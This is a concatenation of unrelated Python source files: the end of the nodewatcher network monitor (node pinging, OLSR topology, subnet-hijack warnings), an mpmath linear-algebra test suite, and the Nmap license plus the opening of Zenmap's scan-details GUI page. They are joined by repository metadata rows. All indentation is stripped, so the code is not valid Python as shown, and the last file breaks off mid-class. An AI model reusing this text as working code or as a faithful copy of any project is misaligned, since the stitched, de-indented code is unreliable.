# XXX UGLY HACK: Some random voltage reports
if 'voltage' in info:
serial = info['voltage']['serial']
voltages = [safe_float_convert(info['voltage'][x].strip()) for x in '1234']
multipliers = [safe_int_convert(info['voltage']['%sm' % x].strip()) for x in '1234']
results = []
for voltage, multiplier in zip(voltages, multipliers):
if voltage is not None:
results.append(voltage * multiplier)
else:
results.append(None)
grapher.add_graph(GraphType.Voltage, 'Voltage ({0})'.format(serial), 'volt_{0}'.format(serial), *results, name = serial)
# Check for installed package versions (every hour)
try:
last_pkg_update = n.installedpackage_set.all()[0].last_update
except:
last_pkg_update = None
if not last_pkg_update or last_pkg_update < datetime.now() - timedelta(hours = 1):
packages = nodewatcher.fetch_installed_packages(n.ip) or {}
# Remove removed packages and update existing package versions
for package in n.installedpackage_set.all():
if package.name not in packages:
package.delete()
else:
package.version = packages[package.name]
package.last_update = datetime.now()
package.save()
del packages[package.name]
# Add added packages
for packageName, version in packages.iteritems():
package = InstalledPackage(node = n)
package.name = packageName
package.version = version
package.last_update = datetime.now()
package.save()
# Check if all selected optional packages are present in package listing
try:
missing_packages = []
for package in n.profile.optional_packages.all():
for pname in package.name.split():
if n.installedpackage_set.filter(name = pname).count() == 0:
missing_packages.append(pname)
if missing_packages:
NodeWarning.create(n, WarningCode.OptPackageNotFound, EventSource.Monitor, details = ("Packages missing: %s" % ", ".join(missing_packages)))
except Profile.DoesNotExist:
pass
# Check if DNS works
if 'dns' in info:
old_dns_works = n.dns_works
n.dns_works = info['dns']['local'] == '0' and info['dns']['remote'] == '0'
if not n.dns_works:
NodeWarning.create(n, WarningCode.DnsDown, EventSource.Monitor)
if old_dns_works != n.dns_works:
# Generate a proper event when the state changes
if n.dns_works:
Event.create_event(n, EventCode.DnsResolverRestored, '', EventSource.Monitor)
else:
Event.create_event(n, EventCode.DnsResolverFailed, '', EventSource.Monitor)
except:
logging.warning("Failed to interpret nodewatcher data for node '%s (%s)'!" % (n.name, n.ip))
logging.warning(format_exc())
NodeWarning.create(n, WarningCode.NodewatcherInterpretFailed, EventSource.Monitor)
n.save()
# When GC debugging is enabled perform some more work
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
gc.collect()
return os.getpid(), len(gc.get_objects())
return None, None
@transaction.commit_on_success
def check_network_status():
"""
Performs the network status check.
"""
# Initialize the state of nodes and subnets, remove out of date ap clients and graph items
Node.objects.all().update(visible = False)
Subnet.objects.all().update(visible = False)
Link.objects.all().update(visible = False)
APClient.objects.filter(last_update__lt = datetime.now() - timedelta(minutes = 11)).delete()
# Reset some states
NodeWarning.objects.all().update(source = EventSource.Monitor, dirty = False)
Node.objects.all().update(warnings = False, conflicting_subnets = False)
# Fetch routing tables from OLSR
try:
nodes, hna = wifi_utils.get_tables(settings.MONITOR_OLSR_HOST)
except TypeError:
logging.error("Unable to fetch routing tables from '%s'!" % settings.MONITOR_OLSR_HOST)
return
# Ping nodes present in the database and visible in OLSR
dbNodes = {}
nodesToPing = []
for nodeIp in nodes.keys():
try:
# Try to get the node from the database
n = Node.get_exclusive(ip = nodeIp)
n.visible = True
n.peers = len(nodes[nodeIp].links)
# If we have succeeded, add to list (if not invalid)
if not n.is_invalid():
if n.awaiting_renumber:
# Reset any status from awaiting renumber to invalid
for notice in n.renumber_notices.all():
try:
rn = Node.objects.get(ip = notice.original_ip)
if rn.status == NodeStatus.AwaitingRenumber:
rn.status = NodeStatus.Invalid
rn.node_type = NodeType.Unknown
rn.awaiting_renumber = False
rn.save()
except Node.DoesNotExist:
pass
notice.delete()
n.awaiting_renumber = False
n.save()
nodesToPing.append(nodeIp)
else:
n.last_seen = datetime.now()
n.peers = len(nodes[nodeIp].links)
# Create a warning since node is not registered
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
n.save()
dbNodes[nodeIp] = n
except Node.DoesNotExist:
# Node does not exist, create an invalid entry for it
n = Node(ip = nodeIp, status = NodeStatus.Invalid, last_seen = datetime.now())
n.visible = True
n.node_type = NodeType.Unknown
n.peers = len(nodes[nodeIp].links)
# Check if there are any renumber notices for this IP address
try:
notice = RenumberNotice.objects.get(original_ip = nodeIp)
n.status = NodeStatus.AwaitingRenumber
n.node_type = notice.node.node_type
n.awaiting_renumber = True
except RenumberNotice.DoesNotExist:
pass
n.save(force_insert = True)
dbNodes[nodeIp] = n
# Create an event and append a warning since an unknown node has appeared
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
Event.create_event(n, EventCode.UnknownNodeAppeared, '', EventSource.Monitor)
# Add a warning to all nodes that have been stuck in renumbering state for over a week
for node in Node.objects.filter(renumber_notices__renumbered_at__lt = datetime.now() - timedelta(days = 7)):
NodeWarning.create(node, WarningCode.LongRenumber, EventSource.Monitor)
node.save()
# Mark invisible nodes as down
for node in Node.objects.exclude(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber)):
oldStatus = node.status
if node.ip not in dbNodes:
if node.status == NodeStatus.New:
node.status = NodeStatus.Pending
elif node.status != NodeStatus.Pending:
node.status = NodeStatus.Down
node.save()
if oldStatus in (NodeStatus.Up, NodeStatus.Visible, NodeStatus.Duped) and node.status == NodeStatus.Down:
Event.create_event(node, EventCode.NodeDown, '', EventSource.Monitor)
# Invalidate uptime credit for this node
node.uptime_last = None
node.save()
# Generate timestamp and snapshot identifier
timestamp = datetime.now()
snapshot_id = int(time.time())
# Setup all node peerings
for nodeIp, node in nodes.iteritems():
n = dbNodes[nodeIp]
n.redundancy_link = False
links = []
# Find old VPN server peers
old_vpn_peers = set([p.dst for p in n.get_peers().filter(dst__vpn_server = True)])
for peerIp, lq, ilq, etx, vtime in node.links:
try:
l = Link.objects.get(src = n, dst = dbNodes[peerIp])
except Link.DoesNotExist:
l = Link(src = n, dst = dbNodes[peerIp])
l.lq = float(lq)
l.ilq = float(ilq)
l.etx = float(etx)
l.vtime = vtime
l.visible = True
l.save()
links.append(l)
# Check if any of the peers has never peered with us before
if n.is_adjacency_important() and l.dst.is_adjacency_important() and not n.peer_history.filter(pk = l.dst.pk).count():
n.peer_history.add(l.dst)
Event.create_event(n, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % l.dst, aggregate = False)
Event.create_event(l.dst, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % n, aggregate = False)
# Check if we have a peering with any VPN servers
if l.dst.vpn_server:
n.redundancy_link = True
if not n.is_invalid():
# Determine new VPN server peers
new_vpn_peers = set([p.dst for p in n.get_peers().filter(visible = True, dst__vpn_server = True)])
if old_vpn_peers != new_vpn_peers:
for p in old_vpn_peers:
if p not in new_vpn_peers:
            # Redundancy loss has occurred
Event.create_event(n, EventCode.RedundancyLoss, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
for p in new_vpn_peers:
if p not in old_vpn_peers:
            # Redundancy restoration has occurred
Event.create_event(n, EventCode.RedundancyRestored, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
# Issue a warning when node requires peering but has none
if n.redundancy_req and not n.redundancy_link:
NodeWarning.create(n, WarningCode.NoRedundancy, EventSource.Monitor)
n.save()
# Archive topology information
data_archive.record_topology_entry(snapshot_id, timestamp, n, links)
# Update valid subnet status in the database
for nodeIp, subnets in hna.iteritems():
if nodeIp not in dbNodes:
continue
for subnet in subnets:
subnet, cidr = subnet.split("/")
try:
s = Subnet.objects.get(node__ip = nodeIp, subnet = subnet, cidr = int(cidr))
s.last_seen = datetime.now()
s.visible = True
except Subnet.DoesNotExist:
s = Subnet(node = dbNodes[nodeIp], subnet = subnet, cidr = int(cidr), last_seen = datetime.now())
s.visible = True
s.allocated = False
# Save previous subnet status for later use
old_status = s.status
      # Set status according to allocation flag
if s.allocated:
s.status = SubnetStatus.AnnouncedOk
else:
s.status = SubnetStatus.NotAllocated
# Check if this is a more specific prefix announce for an allocated prefix
if s.is_more_specific() and not s.allocated:
s.status = SubnetStatus.Subset
# Check if this is a hijack
try:
origin = Subnet.objects.ip_filter(
# Subnet overlaps with another one
ip_subnet__contains = '%s/%s' % (subnet, cidr)
).exclude(
# Of another node (= filter all subnets belonging to current node)
node = s.node
).get(
# That is allocated and visible
allocated = True,
visible = True
)
s.status = SubnetStatus.Hijacked
except Subnet.DoesNotExist:
pass
# Generate an event if status has changed
if old_status != s.status and s.status == SubnetStatus.Hijacked:
Event.create_event(n, EventCode.SubnetHijacked, '', EventSource.Monitor,
data = 'Subnet: %s/%s\n Allocated to: %s' % (s.subnet, s.cidr, origin.node))
# Flag node entry with warnings flag for unregistered announces
if not s.is_properly_announced():
if s.node.border_router and not s.is_from_known_pool():
# TODO when we have peering announce registration this should first check if
# the subnet is registered as a peering
s.status = SubnetStatus.Peering
if not s.node.border_router or s.status == SubnetStatus.Hijacked or s.is_from_known_pool():
# Add a warning message for unregistered announced subnets
NodeWarning.create(s.node, WarningCode.UnregisteredAnnounce, EventSource.Monitor)
s.node.save()
s.save()
# Detect subnets that cause conflicts and raise warning flags for all involved
# nodes
if s.is_conflicting():
NodeWarning.create(s.node, WarningCode.AnnounceConflict, EventSource.Monitor)
s.node.conflicting_subnets = True
s.node.save()
for cs in s.get_conflicting_subnets():
NodeWarning.create(cs.node, WarningCode.AnnounceConflict, EventSource.Monitor)
cs.node.conflicting_subnets = True
cs.node.save()
# Remove subnets that were hijacked but are not visible anymore
for s in Subnet.objects.filter(status = SubnetStatus.Hijacked, visible = False):
Event.create_event(s.node, EventCode.SubnetRestored, '', EventSource.Monitor, data = 'Subnet: %s/%s' % (s.subnet, s.cidr))
s.delete()
# Remove (or change their status) subnets that are not visible
Subnet.objects.filter(allocated = False, visible = False).delete()
Subnet.objects.filter(allocated = True, visible = False).update(status = SubnetStatus.NotAnnounced)
for subnet in Subnet.objects.filter(status = SubnetStatus.NotAnnounced, node__visible = True):
NodeWarning.create(subnet.node, WarningCode.OwnNotAnnounced, EventSource.Monitor)
subnet.node.save()
# Remove invisible unknown nodes
for node in Node.objects.filter(status = NodeStatus.Invalid, visible = False).all():
# Create an event since an unknown node has disappeared
Event.create_event(node, EventCode.UnknownNodeDisappeared, '', EventSource.Monitor)
Node.objects.filter(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber), visible = False).delete()
# Remove invisible links
Link.objects.filter(visible = False).delete()
# Add nodes to topology map and generate output
if not getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
# Only generate topology when graphing is not disabled
topology = DotTopologyPlotter()
for node in dbNodes.values():
topology.addNode(node)
topology.save(os.path.join(settings.GRAPH_DIR, 'network_topology.png'), os.path.join(settings.GRAPH_DIR, 'network_topology.dot'))
# Ping the nodes to prepare information for later node processing
varsize_results = {}
results, dupes = wifi_utils.ping_hosts(10, nodesToPing)
for packet_size in (100, 500, 1000, 1480):
r, d = wifi_utils.ping_hosts(10, nodesToPing, packet_size - 8)
for node_ip in nodesToPing:
varsize_results.setdefault(node_ip, []).append(r[node_ip][3] if node_ip in r else None)
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
# Multiprocessing is disabled (the MONITOR_DISABLE_MULTIPROCESSING option is usually
    # used for debug purposes where a single process is preferred)
for node_ip in nodesToPing:
process_node(node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip))
# Commit the transaction here since we do everything in the same session
transaction.commit()
else:
# We MUST commit the current transaction here, because we will be processing
# some transactions in parallel and must ensure that this transaction that has
    # modified the nodes is committed. Otherwise this will deadlock!
transaction.commit()
worker_results = []
for node_ip in nodesToPing:
worker_results.append(
WORKER_POOL.apply_async(process_node, (node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip)))
)
# Wait for all workers to finish processing
objects = {}
for result in worker_results:
try:
k, v = result.get()
objects[k] = v
except Exception, e:
logging.warning(format_exc())
# When GC debugging is enabled make some additional computations
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
global _MAX_GC_OBJCOUNT
objcount = sum(objects.values())
if '_MAX_GC_OBJCOUNT' not in globals():
_MAX_GC_OBJCOUNT = objcount
logging.debug("GC object count: %d %s" % (objcount, "!M" if objcount > _MAX_GC_OBJCOUNT else ""))
_MAX_GC_OBJCOUNT = max(_MAX_GC_OBJCOUNT, objcount)
# Cleanup all out of date warnings
NodeWarning.clear_obsolete_warnings(EventSource.Monitor)
if __name__ == '__main__':
# Configure logger
logging.basicConfig(level = logging.DEBUG,
format = '%(asctime)s %(levelname)-8s %(message)s',
datefmt = '%a, %d %b %Y %H:%M:%S',
filename = settings.MONITOR_LOGFILE,
filemode = 'a')
# Autodetect fping location
FPING_LOCATIONS = [
getattr(settings, 'FPING_BIN', None),
'/usr/sbin/fping',
'/usr/bin/fping',
'/sw/sbin/fping'
]
for fping_loc in FPING_LOCATIONS:
if not fping_loc:
continue
if os.path.isfile(fping_loc):
wifi_utils.FPING_BIN = fping_loc
logging.info("Found fping in %s." % fping_loc)
break
else:
print "ERROR: Failed to find fping binary! Check that it is installed properly."
exit(1)
# Autodetect graphviz location
GRAPHVIZ_LOCATIONS = [
getattr(settings, 'GRAPHVIZ_BIN', None),
'/usr/bin/neato',
'/sw/bin/neato'
]
for graphviz_loc in GRAPHVIZ_LOCATIONS:
if not graphviz_loc:
continue
if os.path.isfile(graphviz_loc):
DotTopologyPlotter.GRAPHVIZ_BIN = graphviz_loc
logging.info("Found graphviz in %s." % graphviz_loc)
break
else:
print "ERROR: Failed to find graphviz binary! Check that it is installed properly."
exit(1)
# Check if we should just update RRDs
if options.update_rrds:
print ">>> Updating RRDs..."
update_rrds()
print ">>> RRD updates completed."
exit(0)
# Check if we should just perform reverse population of RRDs
if options.reverse_populate:
try:
node = Node.objects.get(pk = options.rp_node)
except Node.DoesNotExist:
print "ERROR: Invalid node specified."
exit(1)
try:
conf = graphs.RRA_CONF_MAP[int(options.rp_graph)]
except (ValueError, KeyError):
print "ERROR: Invalid graph type specified."
exit(1)
print ">>> Reverse populating RRDs for node '%s', graph '%s'..." % (node.name, conf.__name__)
try:
graph = GraphItem.objects.filter(node = node, type = int(options.rp_graph))[0]
except IndexError:
print "ERROR: No graph items of specified type are available for this node."
exit(1)
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
RRA.reverse_populate(node, conf, archive)
exit(0)
# Check if we should just perform stress testing
if options.stress_test:
print ">>> Performing stress test..."
# Force some settings
settings.MONITOR_ENABLE_SIMULATION = True
settings.MONITOR_DISABLE_MULTIPROCESSING = True
# Check network status in a tight loop
try:
for i in xrange(1000):
check_network_status()
check_dead_graphs()
check_events()
# Output progress messages
if i > 0 and i % 10 == 0:
print " > Completed %d iterations. (%d gc objects)" % (i, len(gc.get_objects()))
except KeyboardInterrupt:
print "!!! Aborted by user."
exit(1)
except:
print "!!! Unhandled exception."
print_exc()
exit(1)
print ">>> Stress test completed."
exit(0)
# Output warnings when debug mode is enabled
if getattr(settings, 'DEBUG', None):
logging.warning("Debug mode is enabled, monitor will leak memory!")
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None):
logging.warning("All feeds are being simulated!")
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
logging.warning("Multiprocessing mode disabled.")
if getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
logging.warning("Graph generation disabled.")
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
logging.warning("Garbage collection debugging enabled.")
# Create worker pool and start processing
logging.info("nodewatcher network monitoring system is initializing...")
WORKER_POOL = multiprocessing.Pool(processes = settings.MONITOR_WORKERS)
try:
while True:
# Perform all processing
ts_start = time.time()
try:
check_network_status()
check_dead_graphs()
check_global_statistics()
check_events()
except KeyboardInterrupt:
raise
except:
logging.warning(format_exc())
# Go to sleep for a while
ts_delta = time.time() - ts_start
if ts_delta > settings.MONITOR_POLL_INTERVAL // 2:
logging.warning("Processing took more than half of monitor poll interval ({0} sec)!".format(round(ts_delta, 2)))
ts_delta = settings.MONITOR_POLL_INTERVAL // 2
sleep(settings.MONITOR_POLL_INTERVAL - ts_delta)
except:
logging.warning("Terminating workers...")
WORKER_POOL.terminate()
| agpl-3.0 | 7,879,637,176,988,811,000 | 36.925249 | 224 | 0.635846 | false |
tovrstra/sympy | sympy/mpmath/tests/test_linalg.py | 1 | 7410 | # TODO: don't use round
from __future__ import division
from sympy.mpmath import *
# XXX: these shouldn't be visible(?)
LU_decomp = mp.LU_decomp
L_solve = mp.L_solve
U_solve = mp.U_solve
householder = mp.householder
improve_solution = mp.improve_solution
A1 = matrix([[3, 1, 6],
[2, 1, 3],
[1, 1, 1]])
b1 = [2, 7, 4]
A2 = matrix([[ 2, -1, -1, 2],
[ 6, -2, 3, -1],
[-4, 2, 3, -2],
[ 2, 0, 4, -3]])
b2 = [3, -3, -2, -1]
A3 = matrix([[ 1, 0, -1, -1, 0],
[ 0, 1, 1, 0, -1],
[ 4, -5, 2, 0, 0],
[ 0, 0, -2, 9,-12],
[ 0, 5, 0, 0, 12]])
b3 = [0, 0, 0, 0, 50]
A4 = matrix([[10.235, -4.56, 0., -0.035, 5.67],
[-2.463, 1.27, 3.97, -8.63, 1.08],
[-6.58, 0.86, -0.257, 9.32, -43.6 ],
[ 9.83, 7.39, -17.25, 0.036, 24.86],
[-9.31, 34.9, 78.56, 1.07, 65.8 ]])
b4 = [8.95, 20.54, 7.42, 5.60, 58.43]
A5 = matrix([[ 1, 2, -4],
[-2, -3, 5],
[ 3, 5, -8]])
A6 = matrix([[ 1.377360, 2.481400, 5.359190],
[ 2.679280, -1.229560, 25.560210],
[-1.225280+1.e6, 9.910180, -35.049900-1.e6]])
b6 = [23.500000, -15.760000, 2.340000]
A7 = matrix([[1, -0.5],
[2, 1],
[-2, 6]])
b7 = [3, 2, -4]
A8 = matrix([[1, 2, 3],
[-1, 0, 1],
[-1, -2, -1],
[1, 0, -1]])
b8 = [1, 2, 3, 4]
A9 = matrix([[ 4, 2, -2],
[ 2, 5, -4],
[-2, -4, 5.5]])
b9 = [10, 16, -15.5]
A10 = matrix([[1.0 + 1.0j, 2.0, 2.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 9.0]])
b10 = [1.0, 1.0 + 1.0j, 1.0]
def test_LU_decomp():
A = A3.copy()
b = b3
A, p = LU_decomp(A)
y = L_solve(A, b, p)
x = U_solve(A, y)
assert p == [2, 1, 2, 3]
assert [round(i, 14) for i in x] == [3.78953107960742, 2.9989094874591098,
-0.081788440567070006, 3.8713195201744801, 2.9171210468920399]
A = A4.copy()
b = b4
A, p = LU_decomp(A)
y = L_solve(A, b, p)
x = U_solve(A, y)
assert p == [0, 3, 4, 3]
assert [round(i, 14) for i in x] == [2.6383625899619201, 2.6643834462368399,
0.79208015947958998, -2.5088376454101899, -1.0567657691375001]
A = randmatrix(3)
bak = A.copy()
LU_decomp(A, overwrite=1)
assert A != bak
def test_inverse():
for A in [A1, A2, A5]:
inv = inverse(A)
assert mnorm(A*inv - eye(A.rows), 1) < 1.e-14
def test_householder():
mp.dps = 15
A, b = A8, b8
H, p, x, r = householder(extend(A, b))
assert H == matrix(
[[mpf('3.0'), mpf('-2.0'), mpf('-1.0'), 0],
[-1.0,mpf('3.333333333333333'),mpf('-2.9999999999999991'),mpf('2.0')],
[-1.0, mpf('-0.66666666666666674'),mpf('2.8142135623730948'),
mpf('-2.8284271247461898')],
[1.0, mpf('-1.3333333333333333'),mpf('-0.20000000000000018'),
mpf('4.2426406871192857')]])
assert p == [-2, -2, mpf('-1.4142135623730949')]
assert round(norm(r, 2), 10) == 4.2426406870999998
y = [102.102, 58.344, 36.463, 24.310, 17.017, 12.376, 9.282, 7.140, 5.610,
4.488, 3.6465, 3.003]
def coeff(n):
        # similar to Hilbert matrix
A = []
for i in xrange(1, 13):
A.append([1. / (i + j - 1) for j in xrange(1, n + 1)])
return matrix(A)
residuals = []
refres = []
for n in xrange(2, 7):
A = coeff(n)
H, p, x, r = householder(extend(A, y))
x = matrix(x)
y = matrix(y)
residuals.append(norm(r, 2))
refres.append(norm(residual(A, x, y), 2))
assert [round(res, 10) for res in residuals] == [15.1733888877,
0.82378073210000002, 0.302645887, 0.0260109244,
0.00058653999999999998]
assert norm(matrix(residuals) - matrix(refres), inf) < 1.e-13
def test_factorization():
A = randmatrix(5)
P, L, U = lu(A)
assert mnorm(P*A - L*U, 1) < 1.e-15
def test_solve():
assert norm(residual(A6, lu_solve(A6, b6), b6), inf) < 1.e-10
assert norm(residual(A7, lu_solve(A7, b7), b7), inf) < 1.5
assert norm(residual(A8, lu_solve(A8, b8), b8), inf) <= 3 + 1.e-10
assert norm(residual(A6, qr_solve(A6, b6)[0], b6), inf) < 1.e-10
assert norm(residual(A7, qr_solve(A7, b7)[0], b7), inf) < 1.5
assert norm(residual(A8, qr_solve(A8, b8)[0], b8), 2) <= 4.3
assert norm(residual(A10, lu_solve(A10, b10), b10), 2) < 1.e-10
assert norm(residual(A10, qr_solve(A10, b10)[0], b10), 2) < 1.e-10
def test_solve_overdet_complex():
A = matrix([[1, 2j], [3, 4j], [5, 6]])
b = matrix([1 + j, 2, -j])
assert norm(residual(A, lu_solve(A, b), b)) < 1.0208
def test_singular():
mp.dps = 15
A = [[5.6, 1.2], [7./15, .1]]
B = repr(zeros(2))
b = [1, 2]
def _assert_ZeroDivisionError(statement):
try:
eval(statement)
assert False
except (ZeroDivisionError, ValueError):
pass
for i in ['lu_solve(%s, %s)' % (A, b), 'lu_solve(%s, %s)' % (B, b),
'qr_solve(%s, %s)' % (A, b), 'qr_solve(%s, %s)' % (B, b)]:
_assert_ZeroDivisionError(i)
def test_cholesky():
assert fp.cholesky(fp.matrix(A9)) == fp.matrix([[2, 0, 0], [1, 2, 0], [-1, -3/2, 3/2]])
x = fp.cholesky_solve(A9, b9)
assert fp.norm(fp.residual(A9, x, b9), fp.inf) == 0
def test_det():
assert det(A1) == 1
assert round(det(A2), 14) == 8
assert round(det(A3)) == 1834
assert round(det(A4)) == 4443376
assert det(A5) == 1
assert round(det(A6)) == 78356463
assert det(zeros(3)) == 0
def test_cond():
mp.dps = 15
A = matrix([[1.2969, 0.8648], [0.2161, 0.1441]])
assert cond(A, lambda x: mnorm(x,1)) == mpf('327065209.73817754')
assert cond(A, lambda x: mnorm(x,inf)) == mpf('327065209.73817754')
assert cond(A, lambda x: mnorm(x,'F')) == mpf('249729266.80008656')
@extradps(50)
def test_precision():
A = randmatrix(10, 10)
assert mnorm(inverse(inverse(A)) - A, 1) < 1.e-45
def test_interval_matrix():
a = matrix([['0.1','0.3','1.0'],['7.1','5.5','4.8'],['3.2','4.4','5.6']],
force_type=mpi)
b = matrix(['4','0.6','0.5'], force_type=mpi)
c = lu_solve(a, b)
assert c[0].delta < 1e-13
assert c[1].delta < 1e-13
assert c[2].delta < 1e-13
assert 5.25823271130625686059275 in c[0]
assert -13.155049396267837541163 in c[1]
assert 7.42069154774972557628979 in c[2]
def test_LU_cache():
A = randmatrix(3)
LU = LU_decomp(A)
assert A._LU == LU_decomp(A)
A[0,0] = -1000
assert A._LU is None
def test_improve_solution():
A = randmatrix(5, min=1e-20, max=1e20)
b = randmatrix(5, 1, min=-1000, max=1000)
x1 = lu_solve(A, b) + randmatrix(5, 1, min=-1e-5, max=1.e-5)
x2 = improve_solution(A, x1, b)
assert norm(residual(A, x2, b), 2) < norm(residual(A, x1, b), 2)
def test_exp_pade():
for i in range(3):
dps = 15
extra = 5
mp.dps = dps + extra
dm = 0
while not dm:
m = randmatrix(3)
dm = det(m)
m = m/dm
a = diag([1,2,3])
a1 = m**-1 * a * m
mp.dps = dps
e1 = expm(a1, method='pade')
mp.dps = dps + extra
e2 = m * a1 * m**-1
d = e2 - a
#print d
mp.dps = dps
assert norm(d, inf).ae(0)
mp.dps = 15
| bsd-3-clause | -955,835,800,016,135,800 | 29.493827 | 91 | 0.497571 | false |
grongor/school_rfid | lib/nmap-6.40/zenmap/zenmapGUI/ScanRunDetailsPage.py | 1 | 16962 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ***********************IMPORTANT NMAP LICENSE TERMS************************
# * *
# * The Nmap Security Scanner is (C) 1996-2013 Insecure.Com LLC. Nmap is *
# * also a registered trademark of Insecure.Com LLC. This program is free *
# * software; you may redistribute and/or modify it under the terms of the *
# * GNU General Public License as published by the Free Software *
# * Foundation; Version 2 ("GPL"), BUT ONLY WITH ALL OF THE CLARIFICATIONS *
# * AND EXCEPTIONS DESCRIBED HEREIN. This guarantees your right to use, *
# * modify, and redistribute this software under certain conditions. If *
# * you wish to embed Nmap technology into proprietary software, we sell *
# * alternative licenses (contact [email protected]). Dozens of software *
# * vendors already license Nmap technology such as host discovery, port *
# * scanning, OS detection, version detection, and the Nmap Scripting *
# * Engine. *
# * *
# * Note that the GPL places important restrictions on "derivative works", *
# * yet it does not provide a detailed definition of that term. To avoid *
# * misunderstandings, we interpret that term as broadly as copyright law *
# * allows. For example, we consider an application to constitute a *
# * derivative work for the purpose of this license if it does any of the *
# * following with any software or content covered by this license *
# * ("Covered Software"): *
# * *
# * o Integrates source code from Covered Software. *
# * *
# * o Reads or includes copyrighted data files, such as Nmap's nmap-os-db *
# * or nmap-service-probes. *
# * *
# * o Is designed specifically to execute Covered Software and parse the *
# * results (as opposed to typical shell or execution-menu apps, which will *
# * execute anything you tell them to). *
# * *
# * o Includes Covered Software in a proprietary executable installer. The *
# * installers produced by InstallShield are an example of this. Including *
# * Nmap with other software in compressed or archival form does not *
# * trigger this provision, provided appropriate open source decompression *
# * or de-archiving software is widely available for no charge. For the *
# * purposes of this license, an installer is considered to include Covered *
# * Software even if it actually retrieves a copy of Covered Software from *
# * another source during runtime (such as by downloading it from the *
# * Internet). *
# * *
# * o Links (statically or dynamically) to a library which does any of the *
# * above. *
# * *
# * o Executes a helper program, module, or script to do any of the above. *
# * *
# * This list is not exclusive, but is meant to clarify our interpretation *
# * of derived works with some common examples. Other people may interpret *
# * the plain GPL differently, so we consider this a special exception to *
# * the GPL that we apply to Covered Software. Works which meet any of *
# * these conditions must conform to all of the terms of this license, *
# * particularly including the GPL Section 3 requirements of providing *
# * source code and allowing free redistribution of the work as a whole. *
# * *
# * As another special exception to the GPL terms, Insecure.Com LLC grants *
# * permission to link the code of this program with any version of the *
# * OpenSSL library which is distributed under a license identical to that *
# * listed in the included docs/licenses/OpenSSL.txt file, and distribute *
# * linked combinations including the two. *
# * *
# * Any redistribution of Covered Software, including any derived works, *
# * must obey and carry forward all of the terms of this license, including *
# * obeying all GPL rules and restrictions. For example, source code of *
# * the whole work must be provided and free redistribution must be *
# * allowed. All GPL references to "this License", are to be treated as *
# * including the special and conditions of the license text as well. *
# * *
# * Because this license imposes special exceptions to the GPL, Covered *
# * Work may not be combined (even as part of a larger work) with plain GPL *
# * software. The terms, conditions, and exceptions of this license must *
# * be included as well. This license is incompatible with some other open *
# * source licenses as well. In some cases we can relicense portions of *
# * Nmap or grant special permissions to use it in other open source *
# * software. Please contact [email protected] with any such requests. *
# * Similarly, we don't incorporate incompatible open source software into *
# * Covered Software without special permission from the copyright holders. *
# * *
# * If you have any questions about the licensing restrictions on using *
# * Nmap in other works, are happy to help. As mentioned above, we also *
# * offer alternative license to integrate Nmap into proprietary *
# * applications and appliances. These contracts have been sold to dozens *
# * of software vendors, and generally include a perpetual license as well *
# * as providing for priority support and updates. They also fund the *
# * continued development of Nmap. Please email [email protected] for *
# * further information. *
# * *
# * If you received these files with a written license agreement or *
# * contract stating terms other than the terms above, then that *
# * alternative license agreement takes precedence over these comments. *
# * *
# * Source is provided to this software because we believe users have a *
# * right to know exactly what a program is going to do before they run it. *
# * This also allows you to audit the software for security holes (none *
# * have been found so far). *
# * *
# * Source code also allows you to port Nmap to new platforms, fix bugs, *
# * and add new features. You are highly encouraged to send your changes *
# * to the [email protected] mailing list for possible incorporation into the *
# * main distribution. By sending these changes to Fyodor or one of the *
# * Insecure.Org development mailing lists, or checking them into the Nmap *
# * source code repository, it is understood (unless you specify otherwise) *
# * that you are offering the Nmap Project (Insecure.Com LLC) the *
# * unlimited, non-exclusive right to reuse, modify, and relicense the *
# * code. Nmap will always be available Open Source, but this is important *
# * because the inability to relicense code has caused devastating problems *
# * for other Free Software projects (such as KDE and NASM). We also *
# * occasionally relicense the code to third parties as discussed above. *
# * If you wish to specify special license conditions of your *
# * contributions, just say so when you send them. *
# * *
# * This program is distributed in the hope that it will be useful, but *
# * WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the Nmap *
# * license file for more details (it's in a COPYING file included with *
# * Nmap, and also available from https://svn.nmap.org/nmap/COPYING *
# * *
# ***************************************************************************/
import gtk
from zenmapGUI.higwidgets.higboxes import HIGVBox, HIGHBox, hig_box_space_holder
from zenmapGUI.higwidgets.higtables import HIGTable
from zenmapGUI.higwidgets.higlabels import HIGEntryLabel
import zenmapCore.I18N
class ScanRunDetailsPage(HIGVBox):
def __init__(self, scan):
HIGVBox.__init__(self)
na = _('Not available')
# Command info
self.command_label = HIGEntryLabel(_('Command:'))
self.info_command_label = HIGEntryLabel(na)
self.nmap_version_label = HIGEntryLabel(_('Nmap Version:'))
self.info_nmap_version_label = HIGEntryLabel(na)
self.verbose_label = HIGEntryLabel(_('Verbosity level:'))
self.info_verbose_label = HIGEntryLabel(na)
self.debug_label = HIGEntryLabel(_('Debug level:'))
self.info_debug_label = HIGEntryLabel(na)
self.command_expander = gtk.Expander("<b>"+_("Command Info")+"</b>")
self.command_expander.set_use_markup(True)
self.command_table = HIGTable()
self.command_table.set_border_width(5)
self.command_table.set_row_spacings(6)
self.command_table.set_col_spacings(6)
self.command_hbox = HIGHBox()
self.command_hbox._pack_noexpand_nofill(hig_box_space_holder())
